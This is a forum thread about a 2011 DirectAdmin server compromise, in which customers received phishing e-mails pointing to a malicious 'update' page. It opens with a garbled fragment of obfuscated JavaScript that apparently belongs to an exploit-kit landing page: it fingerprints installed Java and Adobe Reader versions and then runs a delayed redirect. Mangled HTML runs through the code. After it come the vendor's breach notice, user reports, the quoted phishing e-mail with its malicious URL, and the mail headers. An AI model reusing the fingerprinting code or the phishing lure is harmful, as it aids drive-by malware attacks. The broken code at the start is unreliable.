    f = "this,c=f.$,h,d,k,m=p=null,g=null,l=null,a,b;j=(c.isString(j)&&j.length)?j.replace(/\s/,"").toLowerCase():f.mimeType;if(c.isDefined(f.INSTALLED[j])){f.installed=f.INSTALLED[j];return}if(!c.isIE){a="Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";if(f.getVersionDone!==0){f.getVersionDone=0;p=c.getMimeEnabledPlugin(f.mimeType,a);if(!p&&c.hasMimeType(f.mimeType)){p=c.findNavPlugin(a,0)}if(p){f.navPluginObj=p;g=c.getNum(p.description)||c.getNum(p.name);g=c.getPluginFileVersion(p,g);if(!g&&c.OS==1){if(f.pluginHasMimeType(p,"application/vnd.adobe.pdfxml",a)){g="9"}else{if(f.pluginHasMimeType(p,"application/vnd.adobe.x-mars",a)){g="8"}}}}}else{g=f.version}m=c.getMimeEnabledPlugin(j,a);f.installed=m&&g?1:(m?0:(f.navPluginObj?-0.2:-1))}else{p=c.getAXO(f.progID[0])||c.getAXO(f.progID[1]);b=/=\s*([\d\.]+)/g;try{d=(p||c.getDOMobj(c.insertHTML("object",["classid",f.classID],["src",""],"",f))).GetVersions();for(k=0;k<5;k++){if(b.test(d)&&(!g||RegExp.$1" > g)) {
    g = RegExp.$1
}
}
} catch (h) {}
f.installed = g ? 1 : (p ? 0 : -1)
}
if (!f.version) {
    f.version = c.formatNum(g)
}
f.INSTALLED[j] = f.installed
}
},
zz: 0
};PluginDetect.initScript();PluginDetect.getVersion(".");jver = PluginDetect.getVersion("Java", javafile);pdfver = PluginDetect.getVersion("AdobeReader");
} catch (e) {}
if (typeof jver == 'string') {
    jver = jver.split('.')
} else {
    jver = [0, 0, 0, 0]
}
if (typeof pdfver == 'string') {
    pdfver = pdfver.split('.')
} else {
    pdfver = [0, 0, 0, 0]
}
function spl0() {
    spl1()
}
function spl1() {
    spl2()
}
function spl2() {
    spl3()
}
function spl3() {
    spl4()
}
function spl4() {
    spl5()
}
function spl5() {
    spl6()
}
function spl6() {
    setTimeout(end_redirect, 6000)
}
spl0() < /d.length;c++){e.push(d[c])}},javafix:function(){}},adobereader:{mimetype:"application></c.length;a++) {
    b = c[a];
    if (b[0]) {
        break
    }
}
return [].concat(b)
},
cantry: function(d) {
    var > < /len;a++){b=h.getnum(d.get(len-1-a).version);if(b){f.jreall[a]=b}}}}}catch(i){}}if(f.jreall.length></b.allowed.length;
    k++) {
    if (e.isnum(l[k])) {
        b.allowed[k] = l[k]
    }
}
}
for (k = 0; k < c.forceverifytag.length; k++) {
    b.allowed[k] = c.forceverifytag[k]
}
if (e.isstring(d)) {
    c.jar.push(d)
}
if (c.getversiondone == 0) {
    if (!c.version || b.cantryany()) {
        f = b.inserthtmlqueryall(d);
        if (f[0]) {
            c.installed = 1;
            c.endgetversion(f[0], f[1])
        }
    }
    return
}
var > < /navigator.mimetypes.length;h++){j=navigator.mimetypes[h];if(c.test(j.type)&&(e=j.enabledplugin)&&(j=regexp.$2)&&(k.test(e.description||f)||k.test(e.name||f))){i["a"+d.formatnum(j)]=j}}b="0,0,0,0";for(h></this.javaversions.length;n++) {
    f = this.javaversions[n];
    q = "javaplugin." + f[0] + "" + f[1];
    g = f[0] + "." + f[1] + ".";
    for (a = f[2]; a > < /b.length;n=n+2){if(></g.length; a = a + 2) {
        try {
            f[g[a]] = g[a + 1]
        } catch (d) {}
    }
}
},
insertdivinbody: function(i) {
    var > < /c.donefuncs.length;a++){c.callarray(c.donefuncs)}c.emptydiv()},getwidth:function(c){if(c){var></b.length;
    a++) {
    if (b[a] === null) {
        return
    }
    c.call(b[a]);
    b[a] = null
}
}
},
call: function(c) {
    var > < /j.length;f++){if(c.getaxo(j[f])){c.activexenabled=true;break}}c.head=c.isdefined(document.getelementsbytagname)?document.getelementsbytagname("head")[0]:null}c.isgecko=(></d.length;
    a++) {
    if (c > < /f.length;e++){if(></g (b[a], 10)) {
        return > < /math.min(c.length,b.length);a++){if(g(c[a],10)></body > < /html>
 
Thanks for your patience everyone. We are still investigating but don't want to leave you in the dark. Here's what we know so far:

  • Our server was compromised (not at the root level but serious enough nonetheless) and is being used to send those malicious e-mails to customers. We have disabled our mail server to interrupt this process.
  • Some customer information has been compromised: Name, e-mail address, mailing address, license ID#'s.
  • Billing information (e.g. Credit Card numbers, PayPal accounts, etc.) is absolutely safe. We use a restricted merchant gateway that doesn't allow us, even as owners, to view your full credit card information.
  • Finally, don't click that link. It's a malicious program but it can be cleaned with Trend Micro Housecall, MalwareByte's Anti-Malware, etc.
Will keep you updated..

Mark
 
I've only had the one email but have around 40 licenses - presuming all that data is now in the hands of the bad boys :-(
 
Thanks for your patience everyone. We are still investigating but don't want to leave you in the dark. Here's what we know so far:

  • Our server was compromised (not at the root level but serious enough nonetheless) and is being used to send those malicious e-mails to customers. We have disabled our mail server to interrupt this process.
  • Some customer information has been compromised: Name, e-mail address, mailing address, license ID#'s.
  • Billing information (e.g. Credit Card numbers, PayPal accounts, etc.) is absolutely safe. We use a restricted merchant gateway that doesn't allow us, even as owners, to view your full credit card information.
  • Finally, don't click that link. It's a malicious program but it can be cleaned with Trend Micro Housecall, MalwareBye's Anti-Malware, etc.
Will keep you updated..

Mark

Thanks for the update (and honesty) Mark. Just a quick one... now that the license details are known, are we all likely to have reissued licenses?
 
Same thing here:
Dear XXXXXXX,

Please note that currently there is a security vulnerability concerning the current
DirectAdmin version, in order to learn how to protect your server until we can issue
a patch please visit http://www.austinfosec.xxxcom.au/update.php


Thank you,
DirectAdmin.com

I don't give out my middle initial to anybody except a couple entities... and DA is one of them.

Bad news!
 
One more here incase you need it.

Dear Eugene Stover,

Please note that currently there is a security vulnerability concerning the current DirectAdmin version, in order to learn how to protect your server until we can issue a patch please visit http://www.austinfosec.com.au/update.php


Thank you,
DirectAdmin.com

Header:


Received: from jbmc-software.com (216.194.67.119) by my.server.com
(10.0.10.2) with Microsoft SMTP Server (TLS) id 8.1.240.5; Wed, 25 May 2011
16:58:54 -0400
Received: from apache by jbmc-software.com with local (Exim 4.76)
(envelope-from <[email protected]>) id 1QPLBR-0001w9-37 for
[email protected]; Wed, 25 May 2011 15:00:01 -0600
To: <[email protected]>
Subject: DirectAdmin Client Message
From: DirectAdmin <[email protected]>
Message-ID: <[email protected]>
Date: Wed, 25 May 2011 15:00:01 -0600
MIME-Version: 1.0
Content-Type: text/plain
Return-Path: [email protected]
X-MS-Exchange-Organization-PRD: directadmin.com
X-MS-Exchange-Organization-SenderIdResult: Pass
Received-SPF: Pass (SERVER-001.127-001.local: domain of
[email protected] designates 216.194.67.119 as permitted sender)
receiver=SERVER-001.127-001.local; client-ip=216.194.67.119;
helo=jbmc-software.com;
X-MS-Exchange-Organization-SCL: 5
X-MS-Exchange-Organization-PCL: 2
X-MS-Exchange-Organization-Antispam-Report: DV:3.3.10124.509;SV:3.3.9010.377;SID:SenderIDStatus
Pass;OrigIP:216.194.67.119
 
Last edited:
Same thing here:
Dear XXXXXXX,

Please note that currently there is a security vulnerability concerning the current
DirectAdmin version, in order to learn how to protect your server until we can issue
a patch please visit http://www.austinfosec.xxxcom.au/update.php


Thank you,
DirectAdmin.com

I don't give out my middle initial to anybody except a couple entities... and DA is one of them.

Bad news!
check http://directadmin.com/forum/showpost.php?p=204051&postcount=45
 
clearly the user account database was hacked. i'd like assurances that all passwords are reset and i want clear and concise communication as to exactly what happened.
 
Back
Top